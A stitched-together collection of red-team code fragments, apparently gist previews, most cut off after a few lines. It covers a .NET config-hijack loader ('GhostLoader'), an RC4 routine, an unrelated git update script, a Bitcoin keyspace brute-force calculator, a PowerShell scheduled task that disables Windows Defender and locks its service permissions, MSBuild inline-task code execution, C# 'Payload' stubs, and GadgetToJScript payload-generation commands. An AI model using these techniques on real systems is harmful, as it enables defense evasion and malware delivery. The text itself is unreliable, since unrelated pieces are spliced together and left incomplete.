GhostLoader Steps :)
1. Create C:\Tools
2. Copy a .NET binary (any .NET binary will do) to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
public class RC4 { | |
public static byte[] Encrypt(byte[] pwd, byte[] data) { | |
int a, i, j, k, tmp; | |
int[] key, box; | |
byte[] cipher; | |
key = new int[256]; | |
box = new int[256]; | |
cipher = new byte[data.Length]; |
#!/bin/bash | |
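# Remember the directory the script was started from.
CUR_DIR=$(pwd)
# Tell the person running the script what is about to happen.
# printf is used because bash's builtin echo (without -e) prints "\n" and "\033"
# literally instead of emitting a newline and the bold escape sequence.
printf '\n\033[1m%s\033[0m\n\n' "Pulling in latest changes for all repositories..."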
# Find all git repositories and update it to the master latest revision | |
for i in $(find . -name ".git" | cut -c 3-); do |
Function Calculate-BitcoinKeySpaceBrute() { | |
<# | |
.SYNOPSIS | |
Calculate the number of days to brute force a keyspace with BitCrack given an amount of keys per second "mkeys". | |
May be used to calculate time to crack bitcoin puzzle 32 https://privatekeys.pw/puzzles/bitcoin-puzzle-tx | |
Bitcrack: https://github.com/brichard19/BitCrack | |
Author: Steve Borosh (@rvrsh3ll) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None |
# Command line handed to cmd.exe. It does two things to the WinDefend service:
#   1. sc.exe config ... start= disabled  -> sets the service start type to disabled.
#   2. sc.exe sdset ...                   -> replaces the service's security descriptor with a DACL
#      holding two deny ACEs (D = deny, GA = generic all) for WD (Everyone) and OW (Owner Rights).
# NOTE(review): for detection, a start-type change is normally recorded by Service Control Manager
# event 7040 in the System log, and Defender Tamper Protection (where enabled) is intended to block
# this kind of change - confirm both against your own telemetry.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
# Wrap the command line in a scheduled-task action that launches cmd.exe.
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
# Register the action as a task named 'TestTask'.
# NOTE(review): task registration is typically visible as Security event 4698 (when object-access
# auditing is on) and as event 106 in Microsoft-Windows-TaskScheduler/Operational - verify the
# audit policy before relying on either.
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
# Open the Task Scheduler COM interface and connect to the local scheduler service.
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() | |
# Account name for the TrustedInstaller service; how it is used is not visible in this excerpt.
$user = 'NT SERVICE\TrustedInstaller' | |
# Fetch the root task folder, where 'TestTask' was registered above.
$folder = $svc.GetFolder('\') |
using System; | |
using System.IO; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Runtime.InteropServices; | |
using System.Net; | |
using System.IO.Compression; | |
public class Payload | |
{ |
GhostLoader Steps :)
1. Create C:\Tools
2. Copy a .NET binary (any .NET binary will do) to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj --> | |
<!-- Feel free to use a more aggressive class for testing. --> | |
<Target Name="Hello"> | |
<ClassExample /> | |
</Target> | |
<UsingTask | |
TaskName="ClassExample" | |
TaskFactory="CodeTaskFactory" |
using System; | |
using System.IO; | |
using System.Net; | |
using System.Diagnostics; | |
using System.IO.Compression; | |
using System.Runtime.InteropServices; | |
public class Payload | |
{ | |
public Payload() |
Param([parameter(Mandatory=$true, | |
HelpMessage="Directory to search for .NET Assemblies in.")] | |
$Directory, | |
[parameter(Mandatory=$false, | |
HelpMessage="Whether or not to search recursively.")] | |
[switch]$Recurse = $false, | |
[parameter(Mandatory=$false, | |
HelpMessage="Whether or not to include DLLs in the search.")] | |
[switch]$DLLs = $false, | |
[parameter(Mandatory=$false, |
# Command to generate HTA code using GadgetToJScript | |
GadgetToJScript.exe -w hta | |
# Command to generate JS code using GadgetToJScript | |
GadgetToJScript.exe -w js | |
# Command to generate VBS code using GadgetToJScript | |
GadgetToJScript.exe -w vbs | |
# Command to generate VBA code using GadgetToJScript |